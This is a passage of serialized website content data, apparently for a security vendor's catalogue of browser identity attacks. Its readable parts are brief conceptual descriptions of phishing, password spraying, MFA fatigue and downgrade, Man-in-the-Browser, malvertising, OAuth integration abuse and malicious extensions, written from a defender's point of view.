phishing",1790176092778,{"title":17633,"name":17633,"url":17636,"blocks":17637,"state":17643},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fim-phishing",[17638],{"id":17639,"@type":44,"tagName":73,"properties":17640,"responsiveStyles":17641},"builder-pixel-cmbnwlqbyq",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17642},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17644},{"path":21,"query":17645},{},{"kind":20},1790176092733,[],1790176799678,"taf8he11dlf",{"tag":17652},{"@type":105,"id":17296,"model":17052,"value":17653},{"name":17298,"createdDate":17299,"modelId":17056,"data":17654,"meta":17663,"lastUpdated":17312,"id":17296,"query":17664,"published":13,"firstPublished":17314,"rev":17315},{"title":17298,"name":17298,"url":17301,"blocks":17655,"state":17660},[17656],{"id":17304,"@type":44,"tagName":73,"properties":17657,"responsiveStyles":17658},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17659},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17661},{"path":21,"query":17662},{},{"kind":20},[],{"tag":17666},{"@type":105,"id":17091,"model":17052,"value":17667},{"name":17093,"createdDate":17094,"modelId":17056,"data":17668,"lastUpdated":17106,"id":17091,"query":17677,"published":13,"firstPublished":17108,"meta":17678,"rev":17110},{"title":17093,"name":17093,"url":17096,"blocks":17669,"state":17674},[17670],{"id":17099,"@type":44,"tagName":73,"properties":17671,"responsiveStyles":17672},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17673},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17675},{"path":21,"query":17676},{},[],{"kind":20,"hasAutosaves":19},{"tag":17680},{"@type":105,"id":17113,"model":17052,"value":17681},{"name":17115,"createdDate":17116,"modelId":17056,"data":17682,"meta":17691,"lastUpdated":17129,"id":17113,"query":17692,"published":13,"firstPublished":17131,"rev":17132},{"title":17115,"name":17115,"url":17118,"blocks":17683,"state":17688},[17684],{"id":17121,"@type":44,"tagName":73,"properties":17685,"responsiveStyles":17686},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17687},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17689},{"path":21,"query":17690},{},{"kind":20},[],"Phishing is an umbrella term for attacks that trick users into revealing credentials, approving access, or taking harmful actions by impersonating a trusted entity. Modern phishing extends far beyond email — attackers deliver it through IM platforms, social media, in-app notifications, QR codes, SMS, voice calls, and search engine ads. The common thread: the credential theft or action happens in the browser, regardless of the delivery channel.","regular:faFish",{"deviceSize":83,"location":17696},{"path":21,"query":17697},{},"bf19c13652034414b2a5af705dbe85a7",1790585519683,{"kind":20},1790177827497,[],{"createdDate":17704,"data":17705,"id":17746,"lastUpdated":17747,"meta":17748,"modelId":17142,"name":17745,"published":13,"firstPublished":17749,"query":17750,"rev":17145},1790177708293,{"attackTechniques":17706,"browserIdentityAttacksMatrix":17717,"description":17740,"icon":17741,"state":17742,"title":17745,"visibleOnPage":19},[17707],{"attacks":17708},{"@type":105,"id":499,"model":452,"value":17709},{"createdDate":501,"id":499,"name":299,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17710,"data":17711,"variations":17712,"lastUpdated":505,"firstPublished":506,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17713,"meta":17714,"rev":17716},[],{"name":299,"url":301},{},[],{"breakpoints":17715,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"zx2dhjvu3dk",[17718],{"tag":17719},{"@type":105,"id":17720,"model":17052,"value":17721},"38476e4af8eb4be29effcb4103470669",{"name":17722,"createdDate":17723,"modelId":17056,"data":17724,"meta":17735,"lastUpdated":17736,"id":17720,"query":17737,"published":13,"firstPublished":17738,"rev":17739},"SAT1007 \u002F App spraying",1790176084509,{"title":17722,"name":17722,"url":17725,"blocks":17726,"state":17732},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fapp-spraying",[17727],{"id":17728,"@type":44,"tagName":73,"properties":17729,"responsiveStyles":17730},"builder-pixel-een1472az8n",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17731},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17733},{"path":21,"query":17734},{},{"kind":20},1790176084211,[],1790176799758,"nf9z8fn5sn","Password spraying is an attack that tests a small number of commonly used passwords against a large number of accounts. Distinct from credential stuffing (which uses known leaked password pairs) and brute force (which tries many passwords against one account). Designed to stay below account lockout thresholds. Often the first step before more targeted attacks.","regular:faRaindrops",{"deviceSize":83,"location":17743},{"path":21,"query":17744},{},"Password spraying","0c99e97fb9cf4eed9de03f3e398413dd",1790585518845,{"kind":20},1790177827502,[],{"createdDate":17752,"data":17753,"id":17784,"lastUpdated":17785,"meta":17786,"modelId":17142,"name":294,"published":13,"firstPublished":17787,"query":17788,"rev":17145},1790177707846,{"attackTechniques":17754,"browserIdentityAttacksMatrix":17764,"description":17779,"icon":17780,"state":17781,"title":294,"visibleOnPage":19},[17755],{"attacks":17756},{"@type":105,"id":597,"model":452,"value":17757},{"createdDate":599,"id":597,"name":294,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17758,"data":17759,"variations":17760,"lastUpdated":603,"firstPublished":604,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17761,"meta":17762,"rev":17570},[],{"name":294,"url":296},{},[],{"breakpoints":17763,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[17765],{"tag":17766},{"@type":105,"id":17631,"model":17052,"value":17767},{"name":17633,"createdDate":17634,"modelId":17056,"data":17768,"meta":17777,"lastUpdated":17647,"id":17631,"query":17778,"published":13,"firstPublished":17649,"rev":17650},{"title":17633,"name":17633,"url":17636,"blocks":17769,"state":17774},[17770],{"id":17639,"@type":44,"tagName":73,"properties":17771,"responsiveStyles":17772},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17773},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17775},{"path":21,"query":17776},{},{"kind":20},[],"Mobile phishing is a phishing attack delivered via QR codes (quishing) or SMS messages (smishing) rather than email. Bypasses email security entirely because the phishing link never passes through the email gateway. QR codes are particularly effective because they force the user onto a mobile device where URL inspection is harder and security tooling is typically weaker.","regular:faQrcode",{"deviceSize":83,"location":17782},{"path":21,"query":17783},{},"5906d6b59e3a48e3ba4444570c352aa9",1790585517700,{"kind":20},1790177827508,[],{"createdDate":17790,"data":17791,"id":17831,"lastUpdated":17832,"meta":17833,"modelId":17142,"name":17830,"published":13,"firstPublished":17834,"query":17835,"rev":17145},1790177707307,{"attackTechniques":17792,"browserIdentityAttacksMatrix":17802,"description":17825,"icon":17826,"state":17827,"title":17830,"visibleOnPage":19},[17793],{"attacks":17794},{"@type":105,"id":451,"model":452,"value":17795},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17796,"data":17797,"variations":17798,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":17799,"lastUpdateSource":60,"meta":17800,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":17801,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[17803],{"tag":17804},{"@type":105,"id":17805,"model":17052,"value":17806},"af252eaea9f247b2b2a1558699f931a7",{"name":17807,"createdDate":17808,"modelId":17056,"data":17809,"meta":17820,"lastUpdated":17821,"id":17805,"query":17822,"published":13,"firstPublished":17823,"rev":17824},"SAT1024 \u002F MFA fatigue",1790176096459,{"title":17807,"name":17807,"url":17810,"blocks":17811,"state":17817},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fmfa-fatigue",[17812],{"id":17813,"@type":44,"tagName":73,"properties":17814,"responsiveStyles":17815},"builder-pixel-9a43difd7y",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17816},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17818},{"path":21,"query":17819},{},{"kind":20},1790176096436,[],1790176799618,"opsid2k663t","MFA fatigue (or push bombing) is an attack where the attacker repeatedly triggers MFA push notifications to a victim's phone, hoping they'll approve one out of frustration or confusion — often late at night or during busy periods. Largely mitigated by number matching and phishing-resistant MFA (FIDO2\u002Fpasskeys), but still effective against organizations using simple push-approve MFA.","regular:faBellPlus",{"deviceSize":83,"location":17828},{"path":21,"query":17829},{},"MFA fatigue \u002F push bombing","b631ea5e06374912b420d986b9bfe1bd",1790585516620,{"kind":20},1790177827514,[],{"createdDate":17837,"data":17838,"id":17878,"lastUpdated":17879,"meta":17880,"modelId":17142,"name":3000,"published":13,"firstPublished":17881,"query":17882,"rev":17145},1790177706898,{"attackTechniques":17839,"browserIdentityAttacksMatrix":17849,"description":17872,"hint":17873,"icon":17874,"state":17875,"title":3000,"visibleOnPage":19},[17840],{"attacks":17841},{"@type":105,"id":451,"model":452,"value":17842},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17843,"data":17844,"variations":17845,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":17846,"lastUpdateSource":60,"meta":17847,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":17848,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[17850],{"tag":17851},{"@type":105,"id":17852,"model":17052,"value":17853},"ab46496993c3403eb50fc6e4d3a205be",{"name":17854,"createdDate":17855,"modelId":17056,"data":17856,"meta":17867,"lastUpdated":17868,"id":17852,"query":17869,"published":13,"firstPublished":17870,"rev":17871},"SAT1045 \u002F MFA downgrade",1790176095966,{"title":17854,"name":17854,"url":17857,"blocks":17858,"state":17864},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fmfa-downgrade",[17859],{"id":17860,"@type":44,"tagName":73,"properties":17861,"responsiveStyles":17862},"builder-pixel-ralo1qj6v1",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17863},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17865},{"path":21,"query":17866},{},{"kind":20},1790176095942,[],1790176799623,"b1igbzmrs9h","MFA downgrade is an attack that forces a user's authentication to fall back from a stronger MFA method to a weaker one — for example, from FIDO2\u002Fpasskey to SMS OTP or email verification. Attackers exploit IdP configurations that allow fallback methods, or manipulate the authentication flow to trigger a downgrade. Once downgraded to a weaker factor, the attacker can intercept or social-engineer the code. In practice this is an extension of AiTM rather than a distinct attack — AiTM phishing kits manipulate the proxied login flow to trigger the fallback, then capture the weaker factor in transit.","Also known as: authentication downgrade \u002F step-down attack","regular:faShieldMinus",{"deviceSize":83,"location":17876},{"path":21,"query":17877},{},"0e58d45908c9407a805cd5eb5710cfb5",1790585515402,{"hasAutosaves":19,"kind":20},1790177827520,[],{"createdDate":17884,"data":17885,"id":17920,"lastUpdated":17921,"meta":17922,"modelId":17142,"name":11471,"published":13,"firstPublished":17923,"query":17924,"rev":17145},1790177706449,{"browserIdentityAttacksMatrix":17886,"description":17915,"icon":17916,"state":17917,"title":11471,"visibleOnPage":19},[17887,17901],{"tag":17888},{"@type":105,"id":17852,"model":17052,"value":17889},{"name":17854,"createdDate":17855,"modelId":17056,"data":17890,"meta":17899,"lastUpdated":17868,"id":17852,"query":17900,"published":13,"firstPublished":17870,"rev":17871},{"title":17854,"name":17854,"url":17857,"blocks":17891,"state":17896},[17892],{"id":17860,"@type":44,"tagName":73,"properties":17893,"responsiveStyles":17894},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17895},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17897},{"path":21,"query":17898},{},{"kind":20},[],{"tag":17902},{"@type":105,"id":17805,"model":17052,"value":17903},{"name":17807,"createdDate":17808,"modelId":17056,"data":17904,"meta":17913,"lastUpdated":17821,"id":17805,"query":17914,"published":13,"firstPublished":17823,"rev":17824},{"title":17807,"name":17807,"url":17810,"blocks":17905,"state":17910},[17906],{"id":17813,"@type":44,"tagName":73,"properties":17907,"responsiveStyles":17908},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17909},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17911},{"path":21,"query":17912},{},{"kind":20},[],"MFA bypass is an umbrella term for techniques that get an attacker past multi-factor authentication without defeating the factor itself — proxying the login in real time (AiTM), forcing a fallback to a weaker factor (MFA downgrade), bombarding the user with push prompts (MFA fatigue), or skipping authentication entirely by stealing the post-MFA session. MFA raises the bar, but modern phishing kits are built to clear it.","regular:faShieldSlash",{"deviceSize":83,"location":17918},{"path":21,"query":17919},{},"65e6d314c412426aa9449a44606c3961",1790585514558,{"kind":20},1790177827526,[],{"createdDate":17926,"data":17927,"id":17978,"lastUpdated":17979,"meta":17980,"modelId":17142,"name":17977,"published":13,"firstPublished":17981,"query":17982,"rev":17145},1790177705516,{"attackTechniques":17928,"browserIdentityAttacksMatrix":17957,"description":17972,"icon":17973,"state":17974,"title":17977,"visibleOnPage":19},[17929,17938,17947],{"attacks":17930},{"@type":105,"id":17333,"model":452,"value":17931},{"createdDate":17335,"id":17333,"name":304,"modelId":456,"published":13,"meta":17932,"stageModifiedSincePublish":6,"query":17934,"data":17935,"variations":17936,"lastUpdated":17341,"firstPublished":17342,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17937,"rev":17344},{"breakpoints":17933,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":304,"url":306},{},[],{"attacks":17939},{"@type":105,"id":541,"model":452,"value":17940},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17941,"data":17942,"variations":17943,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17944,"meta":17945,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":17946,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":17948},{"@type":105,"id":555,"model":452,"value":17949},{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17950,"data":17951,"variations":17952,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17953,"meta":17954,"rev":17956},[],{"name":275,"url":277},{},[],{"breakpoints":17955,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"1r1gbmvxw5k",[17958],{"tag":17959},{"@type":105,"id":17348,"model":17052,"value":17960},{"name":17350,"createdDate":17351,"modelId":17056,"data":17961,"meta":17970,"lastUpdated":17364,"id":17348,"query":17971,"published":13,"firstPublished":17366,"rev":17367},{"title":17350,"name":17350,"url":17353,"blocks":17962,"state":17967},[17963],{"id":17356,"@type":44,"tagName":73,"properties":17964,"responsiveStyles":17965},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":17966},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":17968},{"path":21,"query":17969},{},{"kind":20},[],"Man-in-the-Browser (MitB) is an attack in which a trojan hooks into the browser process and manipulates web transactions in real time — historically used for banking fraud, where the malware silently altered transfer details while showing the user the original values. It is a consequence of endpoint malware rather than a browser-native attack. MFA doesn't help because the malware operates on the already-authenticated session. Largely superseded by infostealers (which exfiltrate credentials and cookies in bulk) and malicious browser extensions (which achieve similar in-browser manipulation through the extension API).","regular:faBrowser",{"deviceSize":83,"location":17975},{"path":21,"query":17976},{},"Man-in-the-Browser (MitB)","d73c0b3d2835498da8c508164a3f817f",1790585513754,{"kind":20},1790177827536,[],{"createdDate":17984,"data":17985,"id":18011,"lastUpdated":18012,"meta":18013,"modelId":17142,"name":7847,"published":13,"firstPublished":18014,"query":18015,"rev":17145},1790177704357,{"attackTechniques":17986,"description":18005,"hint":18006,"icon":18007,"state":18008,"title":7847,"visibleOnPage":19},[17987,17996],{"attacks":17988},{"@type":105,"id":468,"model":452,"value":17989},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17990,"data":17991,"variations":17992,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":17993,"meta":17994,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":17995,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":17997},{"@type":105,"id":541,"model":452,"value":17998},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":17999,"data":18000,"variations":18001,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18002,"meta":18003,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":18004,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Malvertising is malicious content delivered through paid advertising networks, including sponsored search results and display ads on legitimate, high-traffic websites. Attacks range from forced redirects to exploit kit delivery to fake download pages.","Also known as: malicious search results \u002F sponsored search phishing","regular:faRectangleAd",{"deviceSize":83,"location":18009},{"path":21,"query":18010},{},"20e8c1cdc2a34a96842e5b8248b7d3bc",1790585512920,{"kind":20},1790177827542,[],{"createdDate":18017,"data":18018,"id":18152,"lastUpdated":18153,"meta":18154,"modelId":17142,"name":270,"published":13,"firstPublished":18155,"query":18156,"rev":17145},1790177703937,{"attackTechniques":18019,"browserIdentityAttacksMatrix":18029,"description":18146,"hint":18147,"icon":18148,"state":18149,"title":270,"visibleOnPage":19},[18020],{"attacks":18021},{"@type":105,"id":583,"model":452,"value":18022},{"createdDate":585,"id":583,"name":270,"modelId":456,"published":13,"meta":18023,"stageModifiedSincePublish":6,"query":18025,"data":18026,"variations":18027,"lastUpdated":591,"firstPublished":592,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18028,"rev":17499},{"breakpoints":18024,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":270,"url":272},{},[],[18030,18044,18066,18080,18102,18124],{"tag":18031},{"@type":105,"id":17503,"model":17052,"value":18032},{"name":17505,"createdDate":17506,"modelId":17056,"data":18033,"lastUpdated":17518,"id":17503,"query":18042,"published":13,"firstPublished":17520,"meta":18043,"rev":17522},{"title":17505,"name":17505,"url":17508,"blocks":18034,"state":18039},[18035],{"id":17511,"@type":44,"tagName":73,"properties":18036,"responsiveStyles":18037},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18038},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18040},{"path":21,"query":18041},{},[],{"kind":20,"hasAutosaves":19},{"tag":18045},{"@type":105,"id":18046,"model":17052,"value":18047},"d00cd2f42b874481a7d666ab83098c4a",{"name":18048,"createdDate":18049,"modelId":17056,"data":18050,"lastUpdated":18061,"id":18046,"query":18062,"published":13,"firstPublished":18063,"meta":18064,"rev":18065},"SAT1040 \u002F Hijack OAuth flows",1790176091801,{"title":18048,"name":18048,"url":18051,"blocks":18052,"state":18058},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fhijack-oauth-flows",[18053],{"id":18054,"@type":44,"tagName":73,"properties":18055,"responsiveStyles":18056},"builder-pixel-h30w6dplgck",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18057},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18059},{"path":21,"query":18060},{},1790176091616,[],1790176799684,{"kind":20,"hasAutosaves":19},"gq2rev2c0e",{"tag":18067},{"@type":105,"id":17525,"model":17052,"value":18068},{"name":17527,"createdDate":17528,"modelId":17056,"data":18069,"meta":18078,"lastUpdated":17541,"id":17525,"query":18079,"published":13,"firstPublished":17543,"rev":17544},{"title":17527,"name":17527,"url":17530,"blocks":18070,"state":18075},[18071],{"id":17533,"@type":44,"tagName":73,"properties":18072,"responsiveStyles":18073},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18074},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18076},{"path":21,"query":18077},{},{"kind":20},[],{"tag":18081},{"@type":105,"id":18082,"model":17052,"value":18083},"a9126565928f40bab024f2db4c670135",{"name":18084,"createdDate":18085,"modelId":17056,"data":18086,"meta":18097,"lastUpdated":18098,"id":18082,"query":18099,"published":13,"firstPublished":18100,"rev":18101},"SAT1016 \u002F Evil twin integrations",1790176090337,{"title":18084,"name":18084,"url":18087,"blocks":18088,"state":18094},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fevil-twin-integrations",[18089],{"id":18090,"@type":44,"tagName":73,"properties":18091,"responsiveStyles":18092},"builder-pixel-lphpgrs56j",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18093},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18095},{"path":21,"query":18096},{},{"kind":20},1790176090304,[],1790176799703,"aid10n2eems",{"tag":18103},{"@type":105,"id":18104,"model":17052,"value":18105},"41ea5b349d15400d8a75b564d108f73a",{"name":18106,"createdDate":18107,"modelId":17056,"data":18108,"meta":18119,"lastUpdated":18120,"id":18104,"query":18121,"published":13,"firstPublished":18122,"rev":18123},"SAT1025 \u002F nOAuth",1790176096953,{"title":18106,"name":18106,"url":18109,"blocks":18110,"state":18116},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Fnoauth",[18111],{"id":18112,"@type":44,"tagName":73,"properties":18113,"responsiveStyles":18114},"builder-pixel-awi5pu23fak",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18115},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18117},{"path":21,"query":18118},{},{"kind":20},1790176096930,[],1790176799612,"bph7clc0nvr",{"tag":18125},{"@type":105,"id":18126,"model":17052,"value":18127},"8c2879165313416ba75c5787d39c64e4",{"name":18128,"createdDate":18129,"modelId":17056,"data":18130,"meta":18141,"lastUpdated":18142,"id":18126,"query":18143,"published":13,"firstPublished":18144,"rev":18145},"SAT1026 \u002F OAuth token enumeration",1790176097425,{"title":18128,"name":18128,"url":18131,"blocks":18132,"state":18138},"\u002Fresources\u002Fbrowser-identity-attacks-matrix\u002Foauth-token-enumeration",[18133],{"id":18134,"@type":44,"tagName":73,"properties":18135,"responsiveStyles":18136},"builder-pixel-ydmjrittzg",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18137},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18139},{"path":21,"query":18140},{},{"kind":20},1790176097402,[],1790176799605,"roedmcpw37k","Malicious OAuth integration attacks are supply chain attacks that exploit the web of OAuth integrations connecting third-party apps to your core SaaS environment. Rather than phishing your users directly, attackers compromise a vendor your organization already trusts — then use its existing OAuth grants to read mail, exfiltrate files, and pivot into connected tenants. Because access rides on legitimate, previously-approved tokens, there is no login event to detect, MFA is never challenged, and the access survives password resets. Related patterns include evil twin integrations, nOAuth account takeover, and OAuth token enumeration.","Also known as: OAuth abuse \u002F SaaS supply chain attack \u002F third-party integration compromise","regular:faPlug",{"deviceSize":83,"location":18150},{"path":21,"query":18151},{},"354dbfc91f384812a4659f65ff8f31de",1790585511802,{"kind":20},1790177827547,[],{"createdDate":18158,"data":18159,"id":18175,"lastUpdated":18176,"meta":18177,"modelId":17142,"name":280,"published":13,"firstPublished":18178,"query":18179,"rev":17145},1790177703404,{"attackTechniques":18160,"description":18170,"icon":18171,"state":18172,"title":280,"visibleOnPage":19},[18161],{"attacks":18162},{"@type":105,"id":569,"model":452,"value":18163},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":18164,"stageModifiedSincePublish":6,"query":18166,"data":18167,"variations":18168,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18169,"rev":17427},{"breakpoints":18165,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],"Malicious file downloads are files downloaded through the browser that carry malware, such as drive-by downloads and trojanized software installers. Includes file types commonly used for malware delivery (.exe, .msi, .iso, .js, .vbs, .ps1, .hta).","regular:faFileXmark",{"deviceSize":83,"location":18173},{"path":21,"query":18174},{},"8b53d41c81fe4cfdafb85b3eef39c512",1790585510096,{"kind":20},1790177827553,[],{"createdDate":18181,"data":18182,"id":18198,"lastUpdated":18199,"meta":18200,"modelId":17142,"name":275,"published":13,"firstPublished":18201,"query":18202,"rev":17145},1790177702988,{"attackTechniques":18183,"description":18193,"icon":18194,"state":18195,"title":275,"visibleOnPage":19},[18184],{"attacks":18185},{"@type":105,"id":555,"model":452,"value":18186},{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18187,"data":18188,"variations":18189,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18190,"meta":18191,"rev":17956},[],{"name":275,"url":277},{},[],{"breakpoints":18192,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"Malicious browser extensions are browser extensions that steal data, inject ads, hijack search results, or provide backdoor access. Includes supply chain attacks where legitimate extensions are compromised via the developer's account or build pipeline. Extensions have broad permissions — they can read all page content, modify requests, and access cookies across every site the user visits.","regular:faPuzzlePiece",{"deviceSize":83,"location":18196},{"path":21,"query":18197},{},"8972c162dfed42639324b5fbce7a66a7",1790585508669,{"kind":20},1790177827559,[],{"createdDate":18204,"data":18205,"id":18277,"lastUpdated":18278,"meta":18279,"modelId":17142,"name":285,"published":13,"firstPublished":18280,"query":18281,"rev":17145},1790177702462,{"attackTechniques":18206,"browserIdentityAttacksMatrix":18234,"description":18271,"hint":18272,"icon":18273,"state":18274,"title":285,"visibleOnPage":19},[18207,18216,18225],{"attacks":18208},{"@type":105,"id":541,"model":452,"value":18209},{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18210,"data":18211,"variations":18212,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18213,"meta":18214,"rev":17402},[],{"name":285,"url":287},{},[],{"breakpoints":18215,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18217},{"@type":105,"id":468,"model":452,"value":18218},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":18219,"data":18220,"variations":18221,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18222,"meta":18223,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":18224,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},{"attacks":18226},{"@type":105,"id":569,"model":452,"value":18227},{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":18228,"stageModifiedSincePublish":6,"query":18230,"data":18231,"variations":18232,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":18233,"rev":17427},{"breakpoints":18229,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},[],[18235,18249],{"tag":18236},{"@type":105,"id":17348,"model":17052,"value":18237},{"name":17350,"createdDate":17351,"modelId":17056,"data":18238,"meta":18247,"lastUpdated":17364,"id":17348,"query":18248,"published":13,"firstPublished":17366,"rev":17367},{"title":17350,"name":17350,"url":17353,"blocks":18239,"state":18244},[18240],{"id":17356,"@type":44,"tagName":73,"properties":18241,"responsiveStyles":18242},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":18243},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":18245},{"path":21,"query":18246},{},{"kind":20},[],{"tag":18250},{"@type":105,"id":18251,"model":17052,"value":18252},"7b048221473f4d2e897e5c9994330737",{"name":18253,"createdDate":18254,"modelId":17056,"data":18255,"meta":18266,"lastUpdated":18267,"id":18251,"query":18268,"published":13,"firstPublished":18269,"rev":18270},"SAT1028 \u002F Password 